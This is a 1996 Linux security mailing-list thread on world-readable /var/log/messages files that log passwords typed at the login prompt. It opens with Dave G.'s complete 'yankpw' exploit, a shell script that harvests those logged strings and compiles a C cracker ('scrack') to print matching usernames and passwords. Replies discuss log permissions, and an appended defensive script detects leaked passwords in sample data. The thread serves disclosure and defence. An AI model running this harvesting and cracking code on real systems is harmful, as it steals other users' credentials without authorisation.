[Mod: in a disk crash I lost the original of this message posted by Dave to
linux-security so this one is from bugtraq, reposted with author's
permission -- alex]
This old problem refuses to die.
#!/bin/sh
#
# yankpw
#
# Under a lot of linux distributions (I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# <daveg@escape.com>
# http://www.escape.com/~daveg
echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$
grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$
if [ ! -e ./scrack ]
then
   echo "Creating scrack.c"
   cat << ! > scrack.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <crypt.h>
#include <pwd.h>
#include <sys/types.h>
/* A traditional DES crypt(3) hash is 13 characters; the first two are the salt. */
#define get_salt( d, s ) strncpy( d, s, 2 )
int
main(int argc, char **argv)
{
   struct passwd *pwd;
   FILE *fp;
   char buff[80], salt[3], *encrypted_string;
   if ( argc < 2 || ( fp = fopen( argv[1], "r" ) ) == NULL )
   {
      fprintf( stderr, "Couldnt find dict file\n" );
      exit(1);
   }
   salt[2] = '\0';   /* strncpy of 2 chars does not terminate the salt */
   /* For each candidate word, try it against every 13-char DES hash in passwd. */
   while ( fgets( buff, sizeof buff, fp ) != NULL )
   {
      buff[strcspn(buff, "\n")] = '\0';   /* strip the trailing newline, if any */
      setpwent();
      while ( ( pwd = getpwent() ) != NULL )
      {
        /* skip locked ("*") entries and anything that is not a DES hash */
        if ( strcmp( pwd->pw_passwd, "*" ) != 0 &&
           ( strlen( pwd->pw_passwd ) == 13 ) )
        {
           get_salt(salt, pwd->pw_passwd );
           encrypted_string = crypt( buff, salt );
           if ( encrypted_string != NULL &&
                strcmp( encrypted_string, pwd->pw_passwd ) == 0 )
           {
             fprintf( stdout, "l: %s p: %s\n", pwd->pw_name, buff);
             fflush(stdout);
           }
         }
      }
      endpwent();
   }
   fclose(fp);
   return 0;
}
!
   echo "Creating scrack"
   # crypt(3) lives in libcrypt on glibc systems, hence -lcrypt
   cc -O6 -fomit-frame-pointer -s -o scrack scrack.c -lcrypt
fi
./scrack /tmp/messages.dict.$$
echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.
Avery Pennarun
1996-Dec-14  12:36 UTC
Re: [linux-security] LINUX:/var/log/messages world readable
On Tue, 10 Dec 1996, Dave G. wrote:

> #!/bin/sh
> #
> # yankpw
> #
> # Under a lot of linux distributions (I know Redhat 3.0.3 and Slackware 3.0)
> # /var/log/messages is world readable. If a user types in his password at
> # the login prompt, it may get logged to /var/log/messages.
> #
> # I could swear this topic has been beaten to death, but I still see this
> # problem on every linux box I have access to.

On my Debian 1.1 system, the information is logged to /var/log/auth.log,
which has these default permissions:

-rw-r-----   1 root     adm          1897 Dec 14 15:33 auth.log

Still readable by anyone in group adm, but not as dangerous as the
world-readable messages file (which, I believe, can stay world-readable on
most systems for convenience to users). I don't know what the latest Red Hat
would do.

[mod: That is actually the way it should be. I personally a) have the root
password and b) want to be able to browse the messages files for interesting
stuff. I'd then add my user account to the group adm to be able to freely do
that. Red Hat 4.0 has the "secure" logfile, but it has 644 permissions, and
the login failures get logged to the "messages" file anyway..... -- REW]

Avery
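The admin-side counterpart to yankpw, as an added example that is not part of Dave G.'s post or of any distribution's tooling: it uses the same field extraction as yankpw, but instead of feeding the harvested names to a cracker it removes the real account names and reports what is left, which is almost certainly passwords typed at the login: prompt (those users need a password change), and it checks whether a log file is world-readable, the condition the replies above argue about. The function names world_readable and leaked_candidates are this example's own; it assumes the util-linux login(1) message form "LOGIN FAILURE FROM <where>, <name>" that yankpw relies on, and all log lines and passwd entries below are constructed sample data, not real logs.

```shell
#!/bin/sh
# Added example (not Dave G.'s script): find LOGIN FAILURE entries whose
# "user name" is not a real account, and report world-readable log files.
# Assumed log format: "LOGIN FAILURE FROM <where>, <name>" (util-linux login).

LC_ALL=C
export LC_ALL

SAMPLE_LOG=$(mktemp)       # constructed stand-in for /var/log/messages
SAMPLE_PASSWD=$(mktemp)    # constructed stand-in for /etc/passwd
trap 'rm -f "$SAMPLE_LOG" "$SAMPLE_PASSWD"' EXIT

# Constructed sample log lines: alice and bob are real accounts, the other two
# "names" are passwords typed at the login: prompt.
cat > "$SAMPLE_LOG" <<'EOF'
Dec  6 10:01:12 host login[214]: LOGIN FAILURE FROM console, alice
Dec  6 10:01:20 host login[214]: LOGIN FAILURE FROM console, s3cr3tpa55
Dec  6 10:02:03 host login[220]: LOGIN FAILURE FROM ttyp1, bob
Dec  6 10:02:09 host login[220]: LOGIN FAILURE FROM ttyp1, Tr0ub4dor
Dec  6 10:05:44 host sendmail[230]: alias database rebuilt
EOF

# Constructed sample passwd file; only field 1 (login name) is used.
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/sh
alice:x:1000:1000::/home/alice:/bin/sh
bob:x:1001:1001::/home/bob:/bin/sh
EOF

# world_readable FILE: succeeds when "other" has read permission, which is
# the precondition yankpw needs. Column 8 of the ls -l mode string is other-read.
world_readable() {
    [ "$(ls -ld "$1" | cut -c8)" = "r" ]
}

# leaked_candidates LOGFILE PASSWDFILE: prints, one per line, every name taken
# from a LOGIN FAILURE entry that is not an account in PASSWDFILE. The field
# extraction (text after the comma) is the same as yankpw's; the real accounts
# are then removed, so what remains is most likely passwords.
leaked_candidates() {
    _names=$(mktemp)
    cut -d: -f1 "$2" > "$_names"
    grep 'LOGIN FAILURE' "$1" \
        | cut -d',' -f2 \
        | sed 's/^[[:space:]]*//' \
        | sort -u \
        | grep -v -x -F -f "$_names" || :
    rm -f "$_names"
}

chmod 644 "$SAMPLE_LOG"    # mirror the world-readable default the thread complains about
if world_readable "$SAMPLE_LOG"; then
    echo "$SAMPLE_LOG is world-readable: any local user can harvest it"
fi
echo "Probable passwords logged as user names:"
leaked_candidates "$SAMPLE_LOG" "$SAMPLE_PASSWD"
```

Run it against a real /var/log/messages and /etc/passwd by substituting those paths for the two sample files; every name it prints is a password that has already been exposed to whoever can read the log, so the fix is both a password change for the affected users and a 640 root:adm mode on the log, as in Avery's auth.log listing.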